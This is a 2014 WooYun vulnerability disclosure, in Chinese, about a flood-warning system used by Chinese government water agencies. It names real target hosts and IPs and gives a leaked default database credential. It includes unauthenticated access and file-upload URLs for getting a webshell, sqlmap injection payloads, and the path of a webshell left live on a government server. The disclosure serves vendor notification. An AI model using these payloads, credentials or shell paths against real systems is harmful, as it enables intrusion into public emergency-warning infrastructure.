当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063623

漏洞标题:某通用型预警系统存在一系列问题(文件遍历读取/弱口令/可发预警短信、无线信息/越权/Getshell/SQL注入/信息泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 袋鼠妈妈

提交时间:2014-06-05 09:27

修复时间:2014-09-03 09:28

公开时间:2014-09-03 09:28

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-05: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-12: 细节向第三方安全合作伙伴开放
2014-08-03: 细节向核心白帽子及相关领域专家公开
2014-08-13: 细节向普通白帽子公开
2014-08-23: 细节向实习白帽子公开
2014-09-03: 细节向公众公开

简要描述:

某领域通用型预警系统存在一系列问题(文件遍历读取/弱口令/可发预警短信、无线信息/越权/Getshell/SQL注入/信息泄露)

详细说明:

=====================================
软件技术支持:福建四创软件有限公司 网址: www.strongsoft.net
不少省份都有使用该软件,如:

shzh.wlfx.gov.cn/ 
218.86.6.48:3505/
yj.yywater.gov.cn/
222.216.218.28:8088/
219.159.102.99:8088/
218.86.96.98:3505/
111.12.51.221:8088/ 
222.242.107.62:4000/
fxb.lucheng.gov.cn/
183.233.205.85:9001/ 
222.83.214.58:8088/
180.130.175.138:3503/
http://219.159.239.96:8088/


刚开始以为只是目录遍历~~~~详细如下:
1.目录遍历,配置文件可任意读取。
这个还是和网站的配置,但是绝大多数都是可以遍历,以http://219.159.102.99:8088/为例。
遍历目录:
/data/
/news/
/public/
/config/
/UploadFile/
/Report/
/log/
……

1遍历目录1.GIF

1遍历目录2.GIF


2.弱口令
根据1.的目录遍历,看到/config/DataSetConfig%23.xml中
<connection provider="System.Data.SqlClient" string="Data Source=.;Initial Catalog=StrongMain;User
ID=strong;password=strong;">
测试登录用户/密码: strong/strong,登录成功.可实时查看各地水库、水闸、河网、海塘及气象预警信息

2弱口令登录.GIF


3.可发短信及无线信息(这个也是短信吧?),我测试时没有发送成功,直接点击发送时,发现参数userid、cusrtumno为空,但是接口应该是存在的,看到注释且该套程序配有SMSServer短信服务:

3可发短信1.GIF

3可发短信2.GIF

3可发短信3.GIF


4.不登陆可越权访问:
/Warn/OuterWarnForMerger.aspx?hideBtn=30
/Warn/OuterWarnForMerger.aspx?hideBtn=10
……等页面

4越权访问1.GIF

4越权访问2.GIF


5.上传shell
(1)上传未做限制,
基础信息查询-行政信息基本情况-预案管理
(2)免登陆GetShell
通过抓包,直接在已知网址后面加上plan/FloodPlan/FloodPlanList.aspx?
adcd=331081001003000&filetype=156&parentID=0,即可上传任意后缀文件,getshell

5上传shell1.gif

5上传shell2.gif

5上传shell3.gif

5上传shell4.gif


6.其他信息泄漏:
(1)信息管理-基础数据上报-基础数据导出:
(2)部分网站存在视频服务器信息泄漏

6其他信息泄露1.GIF

6其他信息泄露2.GIF


7.SQL注入:
地址:http://shzh.wlfx.gov.cn/Plan/FloodPlan/FloodPlanList.aspx?readOnly=&adcd=331081001003000&filetype=156&r0.26239625721837556

7SQL注入1.GIF

7SQL注入2.GIF


Place: GET
Parameter: filetype
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
  
  Payload: readOnly=&adcd=331081001003000&filetype=156' AND 5030=5030 AND 
'bQhe'='bQhe&r0.26239625721837556
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - 
WHERE or HAVING clause
    Payload: readOnly=&adcd=331081001003000&filetype=156' AND 
9897=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(99) CHAR(121) CHAR(58) (SELECT (CASE WHEN (9897=9897) 
THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(117) CHAR(102) CHAR(116) CHAR(58))) AND 
'bNIj'='bNIj&r0.26239625721837556
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    
Payload: readOnly=&adcd=331081001003000&filetype=156'; WAITFOR DELAY '0:0:5'--&r0.26239625721837556
    
Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: 
readOnly=&adcd=331081001003000&filetype=156' WAITFOR DELAY '0:0:5'--&r0.26239625721837556
---
web 
server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: 
Microsoft SQL Server 2008
available databases [14]:
[*] AhadDataImage
[*] AHADDATE
[*] gq_center
[*] gq_tmp
[*] 
IStrongCMS_ZJWLFX
[*] master
[*] model
[*] msdb
[*] strongmain
[*] StrongWater
[*] tempdb
[*] wenlingslj
[*] 
wenlingSoftdb
[*] wlfxbtest1

漏洞证明:

http://shzh.wlfx.gov.cn//UploadFile/Plan/20140604152732675.aspx (未删)

shell_ok.gif

修复方案:

版权声明:转载请注明来源 袋鼠妈妈@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2014-06-09 23:04

厂商回复:

CNVD确认并在多个政府网站实例上复现所述情况,已经由CNVD同步联系软件生产厂商福建四创公司,; 处置;同时根据测试实例,同步发浙江、广西等分中心处置案例。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-06-05 09:33 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    袋鼠,你又淘气了

  2. 2014-06-05 09:45 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @PythonPig 擦,这么早?

  3. 2014-06-05 09:57 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    太给力了吧哈哈大合集!

  4. 2014-06-05 12:56 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @wefgod 标题不长不给审核呀 o(∩_∩)o @xsser @ xsser 求审核呀 http://wooyun.org/bugs/wooyun-2014-061873/trace/28a87f458a8adf887b9176cd1eb65eaahttp://wooyun.org/bugs/wooyun-2014-062615/trace/e1d2e832658750fe1d7c8057349c1058

  5. 2014-06-05 13:04 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    你这是什么时候提交的,最近通用审核略慢

  6. 2014-06-05 13:18 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @魇 22号提交的

  7. 2014-06-05 15:26 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @魇 狗哥那啥去了。所以慢点

  8. 2014-06-05 15:28 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    @wefgod 狗哥真结婚去拉? 我以为社区说的是开玩笑的..

  9. 2014-06-06 13:23 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @魇 真的。

  10. 2014-08-05 22:24 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @袋鼠妈妈 为什么不删shell?

  11. 2014-08-05 23:40 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @U神 不会还能访问吧?做测试没删所以备注了未删,以为他们会删了,我下次注意啊,谢谢提醒呢

  12. 2014-09-03 16:53 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    还没删

  13. 2014-09-03 18:21 | Seven.Sea ( 实习白帽子 | Rank:76 漏洞数:24 | 唯有安全与美食不可辜负。)

    碉堡了QAQ